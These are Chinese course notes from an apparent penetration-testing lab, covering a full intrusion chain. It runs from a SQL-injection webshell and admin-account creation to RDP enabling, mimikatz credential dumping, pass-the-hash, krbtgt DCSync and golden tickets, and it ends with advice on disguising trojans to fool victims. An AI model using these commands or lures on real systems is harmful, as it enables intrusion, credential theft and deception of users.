内网渗透测试
渗透测试:
信息收集(收集资产) 收集 域名、IP、端口、敏感文件、旁站、目录。(为了找软柿子[安全的高度其实就是水桶效应])
渗透测试的核心:传参
猫舍:获取管理员账号密码[就可以为所欲为] 找不到后台
SQL注入可以写shell
渗透测试人员:通过模拟黑客的入侵手段寻找企业漏洞让他们修复。[未经特意授权拿下服务器、拿下数据 银手铐]
into dumpfile 导出语句
into outfile 导出语句
C:\phpStudy\WWW\index.php
and 1=2 union select 1,'<?php eval($_REQUEST[8]);?>' into outfile 'C:/phpStudy/WWW/nf.php'
fsgr16-b1ferw.aqlab.cn/nf.php 8
webshell管理工具(菜刀 蚁剑 冰蝎 [哥斯拉、C刀、开山斧])
webshell => 想连接目标的远程桌面(完全控制)
[
1、我们要添加管理员账号
2、确定远程服务开启(帮他开)
3、我们要确定可以连接
]
添加账号:net user abc A1B2C3!.Qa /add
(权限问题:计算机不同的用户权限不同[可以自定义])
提权:把你的权限提升到管理员。
1、windows/Linux系统漏洞提权()
2、程序漏洞提权(redis 软件存在漏洞)
3、开了两个网站,然后A网站B网站不同权限
查看系统的状态:systeminfo
烂土豆提权(windows基本通杀 ) windows server 03 08 12
添加管理员:net localgroup administrators abc /add
账号:abc
密码:A1B2C3!.Qa
netstat -ano 查看端口开放情况 (如果开放了3389) PID:1516
tasklist 查看进程
开启3389:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
内网靶场:
访问靶场(猫舍) SQL注入getshell拿到一定的权限 利用windows系统漏洞提权(烂土豆) 添加了windowS的管理员账号密码 (完全控制,连接3389[真实的内网渗透的时候,一般不会连接3389])上传cs马、远控程序[下节课会教你cs]
内网的端口(1-65535)N个和外网的端口他并不是——对应。
路由器的端口映射、转发(他可以设置一个规则)
当有人访问公网的3389端口的时候->B机器的555端口
1、正向连接:我去找她(攻击机去找受害机)
①:能访问到(webshell)
连接3389,但是3389没有渠道给我
[我->webshell(后端代码都可以控制服务器发送数据包)->目标主机]内网穿透
2、反向连接:她来找我(受害机主动找攻击机)
①:目标得有外网
②:找任何的人(公网IP)
③:你得监听自己端口(你得等她)
不容易被发现(现在的安全核心还是外紧内松外部防护很严密,然而内部防护很松懈)
我->交换机〈路由)->安全设备(入站比出站严格)->目标主机
有外网没外网: 1、你可以访问到目标(不代表目标有外网) 2、路由器可以限制出站(目标无法访问外网)
内 -> 公网 <- 内 (花生壳)
端口扫描(扫描一下开了什么端口)·内网机器(可能开了xxx网站、可能开了xxx服务)·不知道的端口查一下,爆破一下....:...
3389(看看有没有)能在目标主机上运行的就在目标主机上运行
一个内网10o台机器(是几个人管理·1-3人)内网的机器的密码有没有可能相同
(他们拿一个小本本记录)密码相同的概率还有的,尤其是一些边缘服务(怎么获取密码)
到内存里面去抓取密码
privilege::debug提升权限
sekurlsa::logonpasswords 抓取密码
log 日志记录内容
域(翻译的不好)·=>网吧系统(网管可以让你下机、直接控制你)0
控制端->客户端(控制端可以控制客户端)
1台控制端同时操作底下所有的客户端
(域是一个功能,但是需要开启,不是说默认就有域)·域(分上下级)
默认是工作组(人人平等)·加入域 建立域(小水管)
核心功能:
域控账号可以登录域内任意主机(加入域,记得把DNs改成域控的DNS)
域控主机的管理员·账户+密码
域控管理员会用自己的域控账号登录客户机,那么我们就可以抓取到域控的账号和密码。
加入域控。·DNs改变,只不是是DNS解析地址改变((主DNS备DNS)
A域控账号可以登录域内任意主机(域控账号)
md5 =>sQL注入,解不出来
数据库校验账户名密码,他的密码校验的是明文密码还是密文密码(存储)
哈希传递的方法!
我们现在有密文密码,我可以直接构建密码密码去登陆
sekurlsa::pth /user:administrator:/domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
\\ DNs注入学过
\\·UNC路径(共享文件)
dir \\DC.zkaq.cn\c$
域控加账号风险太大了。
长期控制的方法。做黄金票据(长期)
通行证,只要有对的票据,域里面的机器都可以无密码登陆
域控的账户秘密去登陆域主机
域主机检查域控登录的账号密码对不对
域主机-> KDd(存放了域控主机账号密码) KDC一般在域控上
黄金票据:利用KDc的账号做成一个票据,可以直接登录
不会因为域控的登录账号密码的变化所变化
KDc的密码
域控服务器的登录账户名和密码
登录主机·的域控制账户密码·要通过KDc验证
KDC 他不需要我们刻意去沟通
你在任何域主机登录域控密码的时候(他会去KDc校验)·域登录
zkaq/administrator
设计时候:域主机->域控密码[改了]·[域主机->KDC(校验)]
黄金票据(长久的控制·KDc账户密码)·因为正常的情况下,KDC也会偶尔的登录域主机
域控主机密码容易被更改 但是KDc他一般情况下不会改
黄金票据(用KDc账户名做的通行证)·﹒任何的域内的机器看到通行证就可以直接认为你是KDc直接放行
kdc的账号密码: ·krbtgt
lsadump::dcsync /user:krbtgt
S-1-5-21-4098506371-3349406080-1400905760
9f7afad7acc9f72b7e338b908795b7da
kerberos::golden ·/admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857·/krbtgt:1176ad25a126d316ed5ea4b60b3d7ldd /ticket:administrator.kiribi
做票据(任何机器都可以做)
kerberos::ptt 123.kiribi
通过sqL注入·->·webshell ->·提权(加了管理员)->·内网穿透(正向连接· reg).->·3389上了第一台机器(不在域里面10.0.1.4)·->·抓取账户名密码(得到了明文的密码)·->·撞库(登录了第二台机器-10.0.1.8)[在域里面的,因为域控账户名密码可以登录任意域主机,然后因为登陆过,所以可以在这里个机器上抓到账户名密码]->·抓到的是密文·->·哈希传递·(拿到了域控权限)·->·(长期控制)·黄金票据[去登录任何域里面的主机并且域控的账户名密码被修改了也没关系]
正常的渗透测试:
寻找漏洞、利用漏洞、拿到一定的权限
后渗透(CS):
提升权限、内网渗透、权限维持
CS的很多都是有后门(简单检测)
phpstudy官方曾经被黑客入侵然后植入有后门很多年
CS : 团伙作案的工具(团队协作)
服务器(CS的服务端) 端口开放
你(CS客户端) -> CS的服务端 -> 攻击事情
丰富的生成木马模块。
Webshell 一句话木马
木马:
webshell (用于网站环境)
系统木马 exe(不需要任何的环境,点击就触发)
Python木马 基于一定的环境
你 -> 入侵别人(留下你的痕迹)
你 -> 服务端 -> 入侵的别人(留下的痕迹是服务端) 让他更加的隐蔽(服务端被人拿了)
CS属于远控:
CS服务端 控制着 被你拿下的机器
远程控制:
心跳包、确认存活(目标来找控制者、分析一下流量)
远控:
被控制者(无公网ip) -> 控制端 [反向连接]
监听器:我要监听XXX端口 XXX方式监听
进程是可以注入:木马程序可以注入到正常的程序里面隐藏
进程的注入是一次性的。
如果关闭从开是没有的
给别人EXE运行是难度
①:话术(给你一个盗版游戏,然后运行的文件改成exe,换个样子) 捆绑[原本的文件里面 + 木马]
②:dll注入[找一个失效的DLL劫持]
exe运行的时候会调用他需要的DLL
宏病毒: office他有宏这个概念[编程]
默认情况下:宏是被禁用(版本)